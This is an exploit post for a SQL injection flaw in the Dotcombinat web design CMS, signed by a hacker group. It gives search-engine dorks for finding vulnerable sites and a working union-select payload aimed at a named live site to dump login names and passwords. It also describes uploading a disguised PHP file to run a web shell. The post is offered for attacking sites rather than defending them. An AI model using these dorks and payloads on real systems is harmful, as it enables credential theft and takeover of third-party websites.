Dotcombinat SQL Injection

`-------------------- IN The NAme OF God --------------------  
  
  
-====Dotcombinat Remote Sql Injection Vulnerability====-  
  
  
#################################################################  
#  
#  
# Exploit Title: Dotcombinat Remote Sql Injection Vulnerability  
#  
# Exploit Author: Mr.XpR  
#  
# SCript Download : http://www.dotcombinat.net  
#  
# Tested on: BackTrack , 7 , Redhat  
#  
# MAil : [email protected]  
#  
#  
#################################################################  
  
  
-====Dork====-  
  
intext:webdesign: dotcombinat berlin inurl:?id=  
  
intext:webdesign: dotcombinat  
  
-====Exploit====-  
  
http://Site.C0M/detail.php?id=[Sqli]  
  
-====Example====-  
  
http://www.gretchen-club.de/detail.php?id=-116+union+select+1,2,3,group_concat%28name,0x3a,passwort%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login  
  
-====information====-  
  
This metod is sql injection with no Sql error   
  
And Upload Image ==> 1.php.jpg and run shell  
  
-====Tnx To====-  
  
Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz  
  
MR.XpR - MMT - Samim.s - FarbodEZRaeL - MR.F@rdin- Inj3Ctor - Black.Viper - UnknowN   
  
Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...  
  
And All IraNHAck Security Team Members IRANHaCK.ORG  
  
  
`